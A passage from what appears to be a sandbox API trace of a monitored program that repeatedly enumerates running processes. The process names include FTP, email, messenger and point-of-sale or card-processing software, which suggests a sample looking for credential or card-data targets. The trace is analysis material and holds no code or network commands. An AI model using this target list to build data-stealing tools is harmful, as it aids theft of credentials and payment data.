th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.478] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0208.484] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0208.487] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0208.490] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0208.493] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0208.559] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0208.562] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0208.566] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0208.568] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0208.571] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0208.573] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0208.576] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0208.578] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0208.581] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0208.583] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0208.585] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0208.587] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0208.666] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0208.669] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0208.671] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0208.674] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0208.697] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0208.700] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0208.710] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0208.713] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0208.716] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0208.809] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0208.813] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0208.817] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0208.821] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0208.824] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0208.827] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0208.831] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0208.835] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0208.839] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0208.871] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0208.875] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0208.878] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0208.881] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0208.885] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0208.891] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0208.895] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0208.898] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0208.902] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0208.905] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0208.925] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0208.929] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0208.933] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0208.937] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0208.940] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0208.943] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0208.946] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0208.950] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0208.955] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0208.959] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0208.962] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0208.973] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0208.976] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0208.981] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0208.984] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0208.988] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0208.991] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0208.993] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0208.996] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0208.998] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0209.001] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0209.003] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0209.006] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0209.016] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0209.019] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0209.022] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0209.024] CloseHandle (hObject=0x19ec) returned 1 [0209.024] Sleep (dwMilliseconds=0x64) [0209.144] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2110 [0209.162] Process32First (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.164] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0209.167] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0209.170] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.173] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0209.176] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.179] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0209.210] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0209.213] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0209.216] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.219] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.222] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0209.225] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, 